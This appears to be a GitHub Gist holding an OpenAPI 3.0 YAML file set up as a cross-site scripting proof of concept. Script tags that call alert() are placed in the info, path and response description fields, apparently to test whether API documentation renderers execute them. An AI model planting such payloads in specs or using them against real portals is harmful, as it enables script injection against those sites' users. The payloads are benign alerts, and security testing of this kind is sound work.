Skip to content

Instantly share code, notes, and snippets.

@RudraDelete26
Created June 24, 2025 09:07
Show Gist options
  • Save RudraDelete26/839d2e33a36e438321300f069268dcd3 to your computer and use it in GitHub Desktop.
Save RudraDelete26/839d2e33a36e438321300f069268dcd3 to your computer and use it in GitHub Desktop.
openapi: 3.0.0
info:
title: Test XSS PoC
description: |
<script>alert("✅ DOM XSS WORKED - Rudra PoC");</script>
version: 1.0.0
paths:
/test:
get:
summary: Basic Test
description: |
<script>alert("🔥 XSS from path description");</script>
responses:
'200':
description: |
<script>alert("💀 XSS from 200 OK Response");</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment